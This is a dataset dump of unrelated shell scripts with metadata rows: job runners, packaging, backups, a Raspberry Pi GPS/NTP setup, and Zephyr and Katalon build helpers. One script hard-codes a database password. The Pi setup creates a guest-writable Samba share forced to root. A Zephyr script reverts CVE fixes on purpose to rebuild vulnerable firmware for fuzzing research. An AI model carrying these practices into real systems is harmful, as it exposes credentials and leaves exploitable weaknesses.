cd $HOME/thesis/reg_stokeslets/
# Reload miniconda to get a clean module environment before activating.
module unload miniconda3/latest
module load miniconda3/latest
conda activate rolling
export start=$SECONDS
# One binding_expt.py run per parameter line, $TPN jobs at a time; per-job
# stdout/stderr are collected under output/outdir7 by --results.
cat par-files/bd_runner07.txt | parallel --results output/outdir7 \
-j $TPN python src/3d/binding_expt.py
export duration=$(( SECONDS - start ))
echo "Completed in $duration seconds"
wait
| true
|
ba7ab0be2c447acffa9076c120db3bac3e47c901
|
Shell
|
probonopd/ungoogled-chromium
|
/packaging/linux_simple/package.sh.ungoogin
|
UTF-8
| 433
| 3.1875
| 3
|
[
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
#!/bin/bash
# Template script: the $ungoog{...} tokens are placeholders that the
# ungoogled-chromium packaging tooling substitutes before this file runs.
set -eux

TARPREFIX=ungoogled-chromium_$ungoog{chromium_version}-$ungoog{release_revision}_linux
CURRENTDIR=$(dirname $(readlink -f $0))
# Assume source tree is outside this script's directory
ARCHIVE_OUTPUT="$CURRENTDIR/$TARPREFIX.tar.xz"
pushd "$CURRENTDIR"
# Archive the release build: files listed in FILES.cfg from out/Default,
# plus the adjacent README, packed into a .tar.xz via buildkit.
python3 -m buildkit filescfg archive -c ../chrome/tools/build/linux/FILES.cfg --build-outputs ../out/Default -o "$ARCHIVE_OUTPUT" -i "$CURRENTDIR/README"
popd
| true
|
119adce4eac096643356f3a7d7dc5899a43adca3
|
Shell
|
ukhas/habcloud-salt-states
|
/ukhasnet/influxdb_backup.sh
|
UTF-8
| 391
| 2.75
| 3
|
[] |
no_license
|
#!/bin/bash
set -eu
# SaltStack (Jinja) template: the {% ... %} blocks are expanded at render
# time, producing one 'influxd backup' invocation per configured database.
# The resulting script streams a tar archive of all backups to stdout.
{% set admin_password = pillar['ukhasnet']['influxdb']['admin_password'] %}
{% set databases = pillar['ukhasnet']['influxdb']['databases'] %}
# NOTE(review): admin_password is set above but never used below — confirm intent.
# Private staging area for influxd's backup files.
mkdir -p /tmp/influx-backups
chmod 700 /tmp/influx-backups
{% for database in databases %}
influxd backup -database {{ database }} /tmp/influx-backups
{% endfor %}
# Emit the archive on stdout (paths relative to /), then clean up.
tar cf - -C / tmp/influx-backups
rm -rf /tmp/influx-backups
| true
|
e428534ce75b7b602db148f29d1888aa0ac724a4
|
Shell
|
hllowarc-ecu/scripts
|
/portfolio/week2/menu.sh
|
UTF-8
| 616
| 3.921875
| 4
|
[] |
no_license
|
#!/bin/bash
# Simple admin menu, gated behind passwordCheck.sh.
# Branch on the password check's exit status directly instead of the
# './script; if [ $? = 0 ]' two-step.
if ./passwordCheck.sh; then
  echo "1) Create a folder"
  echo "2) Copy a folder"
  echo "3) Set a password"
  echo "4) Exit"
  read -r n
  case $n in
    1)./foldermaker.sh;; #if 1 is selected then this script is run
    2)./foldercopier.sh;; # if 2 is selected then this script is run
    3)./setPassword.sh;; # if 3 is selected then this script is run
    4)exit;;
    *)echo -e "Please pick a number between 1 and 4"
  esac
else
  echo "Goodbye!" #if access is denied then this appears
fi
| true
|
d8cc18325b5c2cfb80823a614efb329afef34561
|
Shell
|
erikayahata/ESZB026-17-4-2018C
|
/leitura.sh
|
UTF-8
| 442
| 2.90625
| 3
|
[] |
no_license
|
#!/bin/sh
# Plot the logged sensor angles with gnuplot and write a PNG next to the data.
ARQUIVODADOS=/home/pi/sist_embarcados_git/Amora/dados.txt
ARQUIVOSAIDA=/home/pi/sist_embarcados_git/Amora/dados.png
# The unquoted EOF delimiter lets the shell expand $ARQUIVODADOS/$ARQUIVOSAIDA
# inside the gnuplot program before it is piped in.
gnuplot << EOF
set title "Dados: "
set ylabel "Angulo (º)"
set xlabel "Tempo (s/4)"
set terminal png
set output "$ARQUIVOSAIDA"
plot "$ARQUIVODADOS" \
    linecolor rgb '#0060ad' \
    linetype 1 \
    linewidth 1 \
    pointtype 2 \
    pointsize 1.0 \
    title "Dados obtidos:" \
    with linespoints
EOF
| true
|
167048a4dc05382d78ea36e8e8f03eb342e6e1c0
|
Shell
|
minggrim/.env
|
/util_scripts/dockerhere
|
UTF-8
| 575
| 3.078125
| 3
|
[] |
no_license
|
#!/bin/bash
# dockerhere — run a container with the current directory mounted at /sources.
#   dockerhere IMAGE            anonymous container, removed on exit
#   dockerhere IMAGE NAME       named container, removed on exit
#   dockerhere IMAGE NAME KEEP  named container, kept after exit (any 3rd arg)
# With no arguments, print usage and the local image list.
if [[ -n "$1" ]]; then
	# Options shared by every invocation; quoting "$(pwd)" fixes mounts from
	# directories whose path contains spaces.
	common=(--privileged=true -v "$(pwd):/sources" -w /sources --shm-size=1g -it)
	if [[ -n "$2" ]]; then
		if [[ -n "$3" ]]; then
			docker run --name "$2" "${common[@]}" "$1" /bin/bash
		else
			docker run --name "$2" "${common[@]}" --rm "$1" /bin/bash
		fi
	else
		docker run "${common[@]}" --rm "$1" /bin/bash
	fi
else
	echo "Usage : dockerhere <image_name>"
	echo "Available Docker Images : "
	docker images
fi
| true
|
d201be09db9205b33c6d8c2144ce3a45b9274cb2
|
Shell
|
lisuke/repo
|
/archlinuxcn/julia-git-arrow-git/PKGBUILD
|
UTF-8
| 927
| 2.734375
| 3
|
[] |
no_license
|
pkgname=julia-git-arrow-git
pkgver=2.6.2.0.0.9.g95efe95
epoch=1
pkgrel=2
pkgdesc="Arrow.jl"
url="https://github.com/JuliaData/Arrow.jl"
arch=('any')
license=('MIT')
makedepends=(git julia-pkg-scripts)
depends=(julia-git)
provides=(julia-git-arrow "julia-git-arrowtypes-git=${pkgver}-${pkgrel}" julia-git-arrowtypes)
source=(git+https://github.com/JuliaData/Arrow.jl)
md5sums=('SKIP')
pkgver() {
cd Arrow.jl
git describe --tags | sed -e 's/^[^0-9]*//' -e 's/-/.0.0./' -e 's/-/./g'
}
package() {
cd Arrow.jl
. /usr/lib/julia/julia-install-pkg.sh Arrow "${pkgdir}" "${pkgname}" julia-git
ln -s Arrow/src/ArrowTypes "${pkgdir}/${site_dir}/ArrowTypes"
old_depends=("${depends[@]}")
_depends=() # use a different name to fool makepkg's stupic static check
for dep in "${old_depends[@]}"; do
if [[ "$dep" != julia-git-arrowtypes ]]; then
_depends+=("${dep}")
fi
done
depends=("${_depends[@]}")
}
| true
|
d21c69b04965f16f889e01828c06446b2ef0361e
|
Shell
|
sfahadshahzad/RPi-GPS-PPS-StratumOne
|
/install-gps-pps.sh
|
UTF-8
| 14,090
| 3.140625
| 3
|
[] |
no_license
|
#!/bin/bash
######################################################################
# 2018-11-13-raspbian-stretch-lite
##################################################################
# if a GPS module is already installed and is giving GPS feed on the GPIO-serial port,
# it can generate error messages to the console, because the kernel try to interprete this as commands from the boot console
sudo systemctl stop serial-getty@ttyAMA0.service;
sudo systemctl disable serial-getty@ttyAMA0.service;
sudo sed -i -e "s/console=serial0,115200//" /boot/cmdline.txt;
######################################################################
handle_locale() {
echo -e "\e[32mhandle_locale()\e[0m";
echo -e "\e[36m prepare locale to nothing (default:C.UTF-8)\e[0m";
export LC_TIME=C.UTF-8;
export LC_MONETARY=C.UTF-8;
export LC_ADDRESS=C.UTF-8;
export LC_TELEPHONE=C.UTF-8;
export LC_NAME=C.UTF-8;
export LC_MEASUREMENT=C.UTF-8;
export LC_IDENTIFICATION=C.UTF-8;
export LC_NUMERIC=C.UTF-8;
export LC_PAPER=C.UTF-8;
export LC_CTYPE=C.UTF-8;
export LC_MESSAGES=C.UTF-8;
export LC_ALL=C.UTF-8;
export LANG=C.UTF-8;
export LANGUAGE=C.UTF-8;
sudo sed -i -e "s/^en_GB.UTF-8 UTF-8/\# en_GB.UTF-8 UTF-8/" /etc/locale.gen;
sudo LC_ALL=C.UTF-8 locale-gen --purge;
sudo sh -c "cat << EOF > /etc/default/locale
# /etc/default/locale
LANG=C.UTF-8
LANGUAGE=C.UTF-8
LC_ALL=C.UTF-8
EOF";
}
######################################################################
handle_timezone() {
    # Pin the system timezone to UTC without any interactive prompts.
    printf '\e[32mhandle_timezone()\e[0m\n'
    printf '\e[36m    prepare timezone to Etc/UTC\e[0m\n'
    sudo sh -c "echo 'Etc/UTC' > /etc/timezone"
    sudo dpkg-reconfigure -f noninteractive tzdata
}
######################################################################
handle_update() {
    # Refresh, upgrade and clean the package system in a single &&-chain so
    # that a failing step aborts the remainder.
    # BUGFIX: the autoremove step used to run 'sudo autoremove apt ...' —
    # 'autoremove' is not a command; it is an apt subcommand.
    echo -e "\e[32mhandle_update()\e[0m";
    sudo sync \
    && echo -e "\e[32mupdate...\e[0m" && sudo apt update \
    && echo -e "\e[32mupgrade...\e[0m" && sudo apt full-upgrade -y \
    && echo -e "\e[32mautoremove...\e[0m" && sudo apt autoremove -y --purge \
    && echo -e "\e[32mautoclean...\e[0m" && sudo apt autoclean \
    && echo -e "\e[32mDone.\e[0m" \
    && sudo sync;
}
######################################################################
handle_gps() {
echo -e "\e[32mhandle_gps()\e[0m";
##################################################################
echo -e "\e[36m prepare GPS\e[0m";
##################################################################
# specific to 2017-08-16-raspbian-stretch-lite
echo -e "\e[36m make boot quiet to serial port: serial0\e[0m";
sudo sed -i -e "s/console=serial0,115200//" /boot/cmdline.txt;
sudo systemctl stop serial-getty@ttyAMA0.service;
sudo systemctl disable serial-getty@ttyAMA0.service;
##################################################################
echo -e "\e[36m install gpsd\e[0m";
sudo apt-get -y install gpsd gpsd-clients;
##################################################################
echo -e "\e[36m setup gpsd\e[0m";
sudo systemctl stop gpsd.socket;
sudo systemctl stop gpsd.service;
sudo sh -c "cat << EOF > /etc/default/gpsd
# /etc/default/gpsd
## Stratum1
START_DAEMON=\"true\"
GPSD_OPTIONS=\"-n\"
DEVICES=\"/dev/ttyAMA0 /dev/pps0\"
USBAUTO=\"false\"
GPSD_SOCKET=\"/var/run/gpsd.sock\"
EOF";
sudo systemctl restart gpsd.service;
sudo systemctl restart gpsd.socket;
##################################################################
grep -q Stratum1 /lib/systemd/system/gpsd.socket 2> /dev/null || {
echo -e "\e[36m fix gpsd to listen to all connection requests\e[0m";
sudo sed /lib/systemd/system/gpsd.socket -i -e "s/ListenStream=127.0.0.1:2947/ListenStream=0.0.0.0:2947/";
sudo sh -c "cat << EOF >> /lib/systemd/system/gpsd.socket
;; Stratum1
EOF";
}
grep -q Stratum1 /etc/rc.local 2> /dev/null || {
echo -e "\e[36m tweak GPS device at start up\e[0m";
sudo sed /etc/rc.local -i -e "s/^exit 0$//";
printf "## Stratum1
sudo systemctl stop gpsd.socket;
sudo systemctl stop gpsd.service;
# default GPS device settings at power on
stty -F /dev/ttyAMA0 9600
## custom GPS device settings
## 115200baud io rate,
#printf \x27\x24PMTK251,115200*1F\x5Cr\x5Cn\x27 \x3E /dev/ttyAMA0
#stty -F /dev/ttyAMA0 115200
## 10 Hz update interval
#printf \x27\x24PMTK220,100*2F\x5Cr\x5Cn\x27 \x3E /dev/ttyAMA0
sudo systemctl restart gpsd.service;
sudo systemctl restart gpsd.socket;
# workaround: lets start any gps client to forct gps service to wakeup and work
gpspipe -r -n 1 &
exit 0
" | sudo tee -a /etc/rc.local > /dev/null;
}
[ -f "/etc/dhcp/dhclient-exit-hooks.d/ntp" ] && {
sudo rm -f /etc/dhcp/dhclient-exit-hooks.d/ntp;
}
[ -f "/etc/udev/rules.d/99-gps.rules" ] || {
echo -e "\e[36m create rule to create symbolic link\e[0m";
sudo sh -c "cat << EOF > /etc/udev/rules.d/99-gps.rules
## Stratum1
KERNEL==\"pps0\",SYMLINK+=\"gpspps0\"
KERNEL==\"ttyAMA0\", SYMLINK+=\"gps0\"
EOF";
}
}
######################################################################
handle_pps() {
echo -e "\e[32mhandle_pps()\e[0m";
##################################################################
echo -e "\e[36m install PPS tools\e[0m";
sudo apt-get -y install pps-tools;
##################################################################
grep -q pps-gpio /boot/config.txt 2> /dev/null || {
echo -e "\e[36m setup config.txt for PPS\e[0m";
sudo sh -c "cat << EOF >> /boot/config.txt
# /boot/config.txt
max_usb_current=1
force_turbo=1
disable_overscan=1
hdmi_force_hotplug=1
config_hdmi_boost=4
#hdmi_ignore_cec_init=1
cec_osd_name=Stratum1
#########################################
# standard resolution
hdmi_drive=2
#########################################
# https://www.raspberrypi.org/documentation/configuration/config-txt.md
# https://github.com/raspberrypi/firmware/tree/master/boot/overlays
## Stratum1
# gps + pps + ntp settings
#Name: pps-gpio
#Info: Configures the pps-gpio (pulse-per-second time signal via GPIO).
#Load: dtoverlay=pps-gpio,<param>=<val>
#Params: gpiopin Input GPIO (default "18")
# assert_falling_edge When present, assert is indicated by a falling
# edge, rather than by a rising edge
# dtoverlay=pps-gpio,gpiopin=4,assert_falling_edge
dtoverlay=pps-gpio,gpiopin=4
#Name: pi3-disable-bt
#Info: Disable Pi3 Bluetooth and restore UART0/ttyAMA0 over GPIOs 14 & 15
# N.B. To disable the systemd service that initialises the modem so it
# doesn't use the UART, use 'sudo systemctl disable hciuart'.
#Load: dtoverlay=pi3-disable-bt
#Params: <None>
dtoverlay=pi3-disable-bt
EOF";
}
##################################################################
grep -q pps-gpio /etc/modules 2> /dev/null || {
echo -e "\e[36m add pps-gpio to modules for PPS\e[0m";
sudo sh -c "echo 'pps-gpio' >> /etc/modules";
}
}
######################################################################
######################################################################
disable_ntp() {
    # Retire the classic ntpd so it cannot compete with chrony; systemctl
    # chatter is discarded because the unit may not even be installed.
    printf '\e[32mdisable_ntp()\e[0m\n'
    local verb
    for verb in stop disable; do
        sudo systemctl "$verb" ntp.service > /dev/null 2>&1
    done
}
######################################################################
######################################################################
install_chrony() {
    # chrony replaces both ntpd and systemd-timesyncd as the NTP daemon.
    printf '\e[32minstall_chrony()\e[0m\n'
    sudo apt-get install -y chrony
}
######################################################################
setup_chrony() {
echo -e "\e[32msetup_chrony()\e[0m";
sudo systemctl stop chronyd.service;
sudo sh -c "cat << EOF > /etc/chrony/chrony.conf
# /etc/chrony/chrony.conf
## Stratum1
# https://chrony.tuxfamily.org/documentation.html
# http://www.catb.org/gpsd/gpsd-time-service-howto.html#_feeding_chrony_from_gpsd
# gspd is looking for
# /var/run/chrony.pps0.sock
# /var/run/chrony.ttyAMA0.sock
# Welcome to the chrony configuration file. See chrony.conf(5) for more
# information about usuable directives.
# PPS: /dev/pps0: Kernel-mode PPS ref-clock for the precise seconds
refclock PPS /dev/pps0 refid PPS precision 1e-9 lock NMEA poll 3 trust prefer
# SHM(2), gpsd: PPS data from shared memory provided by gpsd
refclock SHM 2 refid PPSx precision 1e-9 poll 3 trust
# SOCK, gpsd: PPS data from socket provided by gpsd
refclock SOCK /var/run/chrony.pps0.sock refid PPSy precision 1e-9 poll 3 trust
# SHM(0), gpsd: NMEA data from shared memory provided by gpsd
refclock SHM 0 refid NMEA precision 1e-3 offset 0.5 delay 0.2 poll 3 trust require
# any NTP clients are allowed to access the NTP server.
allow
# allows to appear synchronised to NTP clients, even when it is not.
local
# Stratum1 Servers
# https://www.meinbergglobal.com/english/glossary/public-time-server.htm
#
## Physikalisch-Technische Bundesanstalt (PTB), Braunschweig, Germany
#server ptbtime1.ptb.de iburst noselect
#server ptbtime2.ptb.de iburst noselect
#server ptbtime3.ptb.de iburst noselect
#
## Royal Observatory of Belgium
#server ntp1.oma.be iburst noselect
#server ntp2.oma.be iburst noselect
#
## Unizeto Technologies S.A., Szczecin, Polska
#server ntp.certum.pl iburst noselect
#
## SP Swedish National Testing and Research Institute, Boras, Sweden
#server ntp2.sp.se iburst noselect
# Other NTP Servers
#pool de.pool.ntp.org iburst noselect
# This directive specify the location of the file containing ID/key pairs for
# NTP authentication.
keyfile /etc/chrony/chrony.keys
# This directive specify the file into which chronyd will store the rate
# information.
driftfile /var/lib/chrony/chrony.drift
# Uncomment the following line to turn logging on.
#log tracking measurements statistics
# Log files location.
logdir /var/log/chrony
# Stop bad estimates upsetting machine clock.
maxupdateskew 100.0
# This directive tells 'chronyd' to parse the 'adjtime' file to find out if the
# real-time clock keeps local time or UTC. It overrides the 'rtconutc' directive.
hwclockfile /etc/adjtime
# This directive enables kernel synchronisation (every 11 minutes) of the
# real-time clock. Note that it can’t be used along with the 'rtcfile' directive.
rtcsync
# Step the system clock instead of slewing it if the adjustment is larger than
# one second, but only in the first three clock updates.
makestep 1 3
EOF";
sudo systemctl restart chronyd.service;
}
######################################################################
disable_chrony() {
    # Stop and mask chrony (used when switching back to another NTP daemon);
    # output is discarded because the unit may not be present.
    printf '\e[32mdisable_chrony()\e[0m\n'
    local verb
    for verb in stop disable; do
        sudo systemctl "$verb" chronyd.service > /dev/null 2>&1
    done
}
######################################################################
handle_samba() {
    # Install samba and export two guest shares: /media/share (read-write)
    # and the chrony statistics directory (read-only).  The '## Stratum1'
    # marker keeps the smb.conf edit idempotent.
    echo -e "\e[32mhandle_samba()\e[0m";
    ##################################################################
    echo -e "\e[36m    install samba\e[0m";
    sudo apt-get -y install samba;
    ##################################################################
    [ -d "/media/share" ] || {
        echo -e "\e[36m    create share folder\e[0m";
        sudo mkdir -p /media/share;
    }
    ##################################################################
    grep -q Stratum1 /etc/samba/smb.conf 2> /dev/null || {
        echo -e "\e[36m    setup samba\e[0m";
        # BUGFIX: Debian/Raspbian ships the daemon as smbd.service; the old
        # 'systemctl stop smb.service' targeted a unit that does not exist
        # (the restart below already used smbd.service).
        sudo systemctl stop smbd.service;
        #sudo sed -i /etc/samba/smb.conf -n -e "1,/#======================= Share Definitions =======================/p";
        sudo sh -c "cat << EOF >> /etc/samba/smb.conf
## Stratum1
[share]
    comment = Share
    path = /media/share/
    public = yes
    only guest = yes
    browseable = yes
    read only = no
    writeable = yes
    create mask = 0644
    directory mask = 0755
    force create mode = 0644
    force directory mode = 0755
    force user = root
    force group = root
[ntpstats]
    comment = NTP Statistics
    path = /var/log/chrony/
    public = yes
    only guest = yes
    browseable = yes
    read only = yes
    writeable = no
    create mask = 0644
    directory mask = 0755
    force create mode = 0644
    force directory mode = 0755
    force user = root
    force group = root
EOF";
        sudo systemctl restart smbd.service;
    }
}
######################################################################
handle_dhcpcd() {
    # Append a commented static-IP template to dhcpcd.conf exactly once;
    # the '## Stratum1' marker makes the edit idempotent.
    printf '\e[32mhandle_dhcpcd()\e[0m\n'
    if ! grep -q Stratum1 /etc/dhcpcd.conf; then
        printf '\e[36m    setup dhcpcd.conf\e[0m\n'
        sudo sh -c "cat << EOF >> /etc/dhcpcd.conf
## Stratum1
#interface eth0
#static ip_address=192.168.1.161/24
#static routers=192.168.1.1
#static domain_name_servers=192.168.1.1
EOF";
    fi
}
######################################################################
disable_timesyncd() {
    # systemd-timesyncd would fight chrony for clock discipline, so stop it
    # and remove it from the boot sequence; daemon-reload picks up the change.
    echo -e "\e[32mdisable_timesyncd()\e[0m";
    sudo systemctl stop systemd-timesyncd
    sudo systemctl daemon-reload
    sudo systemctl disable systemd-timesyncd
}
######################################################################
## test commands
######################################################################
#dmesg | grep pps
#sudo ppstest /dev/pps0
#sudo ppswatch -a /dev/pps0
#
#sudo gpsd -D 5 -N -n /dev/ttyAMA0 /dev/pps0 -F /var/run/gpsd.sock
#sudo systemctl stop gpsd.*
#sudo killall -9 gpsd
#sudo dpkg-reconfigure -plow gpsd
#minicom -b 9600 -o -D /dev/ttyAMA0
#cgps
#xgps
#gpsmon
#ipcs -m
#ntpshmmon
#
#chronyc sources
#chronyc sourcestats
#chronyc tracking
#watch -n 10 -p chronyc -m sources tracking
######################################################################
# Main sequence: prepare the OS, bring up GPS/PPS, replace the stock
# time daemons with chrony, then configure file sharing and networking.
handle_locale
handle_timezone
handle_update
handle_gps
handle_pps
# Remove competing time services before installing chrony.
disable_timesyncd;
disable_ntp;
install_chrony;
setup_chrony;
handle_samba
handle_dhcpcd
######################################################################
echo -e "\e[32mDone.\e[0m";
# Red warning: boot-config and daemon changes need a reboot to apply.
echo -e "\e[1;31mPlease reboot\e[0m";
| true
|
dff9f187a7242f504679fd40dcf1bc244a637452
|
Shell
|
kaienkira/twilight-line-go
|
/build_windows.sh
|
UTF-8
| 369
| 2.75
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# Cross-compile the twilight-line client and server for Windows/amd64.
# Binaries land in ./bin as twilight-line-go-<role>-windows-amd64.exe.
os=windows
arch=amd64

# build_one <role>: compile the Go module in ./<role> into ../bin.
# Restores the working directory even when the build fails; returns the
# build's exit status.
build_one() {
    local role="$1"
    cd "$role" || return 1
    GOOS="$os" GOARCH="$arch" go build \
        -o ../bin/twilight-line-go-"$role"-"$os"-"$arch".exe
    local rv=$?
    cd - >/dev/null || return 1
    return "$rv"
}

# Same sequence as before (client, then server), without the duplicated
# stanzas and the "if [ $? -ne 0 ]" anti-pattern.
for role in client server; do
    build_one "$role" || exit 1
done
exit 0
| true
|
8859f66daf3741225e6d223479e47396199a1afe
|
Shell
|
kwpeters/juggernautBash
|
/killjobs.bash
|
UTF-8
| 264
| 2.75
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
# This script kills all background jobs.
# Reference: https://unix.stackexchange.com/questions/43527/kill-all-background-jobs
# Debian version
# kill $(jobs -p)
# OS X version
jobs -p | xargs kill
# Gnu version
# jobs -p | xargs -rn10 kill
| true
|
99cbc9a2479358af1f7ce3edcfb7baa5b32ca3f8
|
Shell
|
grassit/scripts-1
|
/revengapi
|
UTF-8
| 186
| 2.640625
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/sh
# Run the reverse engineering api.
# Usage: revengapi <jar> — analyses <jar> with reveng.RevEngAPI.
JAR=${1?Usage: $0 jar}
REVENG_HOME=/home/ian/workspace/revengapi/build
# Work in /tmp so output files do not clutter the caller's directory;
# bail out if the chdir fails rather than writing somewhere unexpected.
cd /tmp || exit 1
# Quote the jar path so paths containing spaces survive word splitting.
java -cp "${REVENG_HOME}:${JAR}" reveng.RevEngAPI -b "${JAR}"
| true
|
87afab83d612d89bd71f20e85d794100cf7464aa
|
Shell
|
kombiHQ/kombi
|
/runtest
|
UTF-8
| 671
| 3.734375
| 4
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# Run the kombi test suite with src/lib on PYTHONPATH, using the
# interpreter named by $KOMBI_PYTHON_EXECUTABLE (default: "python").

# current dir
currentDir="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"

# library dir
libraryDir="$currentDir/src/lib"

case "$(uname -s)" in
    CYGWIN*|MINGW**)
        # Windows-style path and ';' separator on cygwin/mingw.
        # NOTE(review): 'CYGPATH' relies on case-insensitive resolution
        # of the 'cygpath' tool — confirm on a case-sensitive setup.
        export PYTHONPATH="$(CYGPATH -w $libraryDir);$PYTHONPATH"
    ;;
    *)
        export PYTHONPATH="$libraryDir:$PYTHONPATH"
    ;;
esac

# figuring out which python is going to be used for the
# execution
if [[ -z "$KOMBI_PYTHON_EXECUTABLE" ]]; then
    export KOMBI_PYTHON_EXECUTABLE="python"
fi

# Running all tests.
# Bug fix: probe the version of the interpreter that will actually run
# the tests; the original probed bare "python", so a Python 3
# $KOMBI_PYTHON_EXECUTABLE on a Python 2 system chose the wrong
# discovery pattern (and vice versa).
if [[ "$("$KOMBI_PYTHON_EXECUTABLE" --version 2>&1)" == "Python 2"* ]]; then
    $KOMBI_PYTHON_EXECUTABLE -m unittest discover -p "*Test.py" -v
else
    $KOMBI_PYTHON_EXECUTABLE -m unittest discover -v
fi
| true
|
b75d504dfce00c749bb501ee5af28fc47f4aedb3
|
Shell
|
yiguotang/x-cloud
|
/xcloud/xcloud-driver-vmware/src/main/resources/shell/configIP.sh.txt
|
UTF-8
| 354
| 3.109375
| 3
|
[] |
no_license
|
#!/bin/bash
# Configure any network interface that appeared since the baseline list
# /tmp/cloudview_adaptor_1 was taken.
# Usage: configIP.sh <ip> <netmask> <gateway>

# Snapshot current interface names (the part before ':' of each
# /proc/net/dev line; header lines produce non-interface tokens).
cat /proc/net/dev | awk {'print $1'} | awk -F: {'print $1'} > /tmp/cloudview_adaptor_2

while read -r line2
do
    flag=1
    # Skip interfaces already present in the baseline file.
    # Bug fix: quote both sides — the unquoted original made '[' fail
    # on the blank/header lines that /proc/net/dev always contains.
    while read -r line1
    do
        if [ "$line1" == "$line2" ]; then
            flag=0
        fi
    done < /tmp/cloudview_adaptor_1
    if [ "$flag" == 1 ]; then
        # New interface: bring it up with the requested address and
        # install the default route through the given gateway.
        ifconfig "$line2" "$1" netmask "$2" up
        route add default gw "$3"
    fi
done < /tmp/cloudview_adaptor_2
| true
|
8f5c69b5dfc1ed684dc8a3477e567007530679cf
|
Shell
|
Darrenmei96/cps510
|
/script.sh
|
UTF-8
| 1,727
| 3.609375
| 4
|
[] |
no_license
|
#!/bin/bash
# CPS510 assignment menu: create/populate/query/delete Oracle tables
# via sqlplus64.
# NOTE(security): credentials are hard-coded below; prefer reading them
# from the environment or a protected file.
usr="d2mei"
pw="01305179"
sqlinfo="$usr/$pw@(DESCRIPTION=(ADDRESS=(PROTOCOL=TCP)(Host=oracle.scs.ryerson.ca)(Port=1521))(CONNECT_DATA=(SID=orcl)))"

echo "*************************************************"
echo "*             CPS510 - Section 3                *"
echo "*             Ryerson University                *"
echo "* Group members: Jooha Kim, Jian Li, Darren Mei *"
echo "*************************************************"

# Read one menu choice from stdin and dispatch it.
getinput () {
read input
if [ "$input" == "1" ]; then
createtables
sleep .5
elif [ "$input" == "2" ]; then
poptables
sleep .5
elif [ "$input" == "3" ]; then
echo "Write your sql command: "
read sqlcommand
# Feed the one-off command to a silent sqlplus session via heredoc.
sqlplus64 -s "$sqlinfo"<<EOF
$sqlcommand
quit;
EOF
sleep .5
elif [ "$input" == "4" ]; then
sqlplus64 "$sqlinfo"
elif [ "$input" == "5" ]; then
sqlplus64 "$sqlinfo" @advquery.sql
elif [ "$input" == "9" ]; then
deltables
# Bug fix: "sleep.5" (missing space) was a command-not-found error.
sleep .5
# Bug fix: quote $input so an empty answer cannot break the test.
elif [ "$input" == "E" ] || [ "$input" == "e" ]; then
exit
else
echo "INVALID INPUT!!!"
fi
}

#export libraries if necessary
exportlibs () {
export LD_LIBRARY_PATH=/usr/lib/oracle/12.1/client64/lib
}

#create tables
createtables () {
sqlplus64 "$sqlinfo" @tableinit.sql
}

#populate tables
poptables () {
sqlplus64 "$sqlinfo" @tablepop.sql
}

#delete the tables
deltables () {
sqlplus64 "$sqlinfo" @tabledel.sql
}

# Menu loop: print the options, then read and dispatch one choice.
main () {
exportlibs
while true; do
echo "Here are the options currently implemented: "
echo "1: Create the sql tables"
echo "2: Populate the sql tables"
echo "3: Enter commands into the SQL environment"
echo "4: Enter the SQL environment "
echo "5: Run the advanced queries "
echo " "
echo "9: Delete the sql table"
echo "E: Exit the shell script"
getinput
done
}

main
| true
|
034aa6a3d81baaf4b2825166928d3272a689c609
|
Shell
|
fuzzware-fuzzer/fuzzware-experiments
|
/03-fuzzing-new-targets/zephyr-os/building/docker_build_sample.sh
|
UTF-8
| 1,301
| 3.65625
| 4
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
# This script is to be run within the zephyr CI docker container
# It reproduces a vulnerable sample of zephyr-OS for the given CVE
set -x
set -e
# Create zephyr workspace for the given version if needed
workspace_dir=/workdir/workspace-$ZEPHYR_VERSION
if [ ! -e "$workspace_dir" ]; then
west init --mr=zephyr-v$ZEPHYR_VERSION $workspace_dir
cd $workspace_dir
west update
fi
cd /workdir/workspace-$ZEPHYR_VERSION/zephyr
export ZEPHYR_BASE=$(pwd)
# Restore git state
git reset --hard
git clean -df
git checkout "$BASE_COMMIT"
west update
# Backport fix for device binding bug
git cherry-pick 5b36a01a67dd705248496ef46999f39b43e02da9 --no-commit
# Revert the changes that fixed the issue (but keep the other fixes)
for commit in $FIX_COMMITS; do
git revert "$commit" -n
done
# Apply base patches
for patch in ${PATCHES:-}; do
git apply /workdir/building/patches/$patch
done
# Build sample
cd $SAMPLE_DIR
rm -rf build
west build --pristine always -b $BOARD . -- -DSHIELD="$SHIELD" -DOVERLAY_CONFIG="$OVERLAYS" ${EXTRA_DEFINES:-}
# Copy sample to outside-visible directory
OUT_DIR="/workdir/rebuilt/CVE-$CVENUM"
rm -rf $OUT_DIR
mkdir -p $OUT_DIR
cp build/zephyr/zephyr.elf $OUT_DIR/zephyr-CVE-$CVENUM.elf
cp build/zephyr/zephyr.bin $OUT_DIR/zephyr-CVE-$CVENUM.bin
| true
|
a00bfd7a75c3e72166f5a457885a624aff11fa9d
|
Shell
|
katalon-studio/docker-images
|
/test/project/run_chrome_root.sh
|
UTF-8
| 298
| 2.703125
| 3
|
[] |
no_license
|
#!/bin/bash
# Run the Katalon "TS_RegressionTest" suite in Chrome inside the
# katalonstudio/katalon container, mounting the current project.
# Usage: run_chrome_root.sh <katalon-version> <api-key>
set -xe
ksversion=$1
apiKey=$2
# KATALON_USER_ID keeps files the container generates owned by the caller.
docker run -t --rm -e KATALON_USER_ID=`id -u $USER` -v "$(pwd)":/katalon/katalon/source katalonstudio/katalon:$ksversion katalon-execute.sh -browserType="Chrome" -retry=0 -statusDelay=15 -testSuitePath="Test Suites/TS_RegressionTest" -apiKey=${apiKey}
| true
|
cdf883ceed33dbbd548b92f869131057f9c6d62e
|
Shell
|
focusaurus/tealeaves
|
/bin/docker-build.sh
|
UTF-8
| 1,726
| 3.53125
| 4
|
[] |
no_license
|
#!/usr/bin/env bash
# Please Use Google Shell Style: https://google.github.io/styleguide/shell.xml
# ---- Start unofficial bash strict mode boilerplate
# http://redsymbol.net/articles/unofficial-bash-strict-mode/
set -o errexit # always exit on error
set -o errtrace # trap errors in functions as well
set -o pipefail # don't ignore exit codes when piping output
set -o posix # more strict failures in subshells
# set -x # enable debugging
IFS="$(printf "\n\t")"
# ---- End unofficial bash strict mode boilerplate
cd "$(dirname "${BASH_SOURCE[0]}")/.."
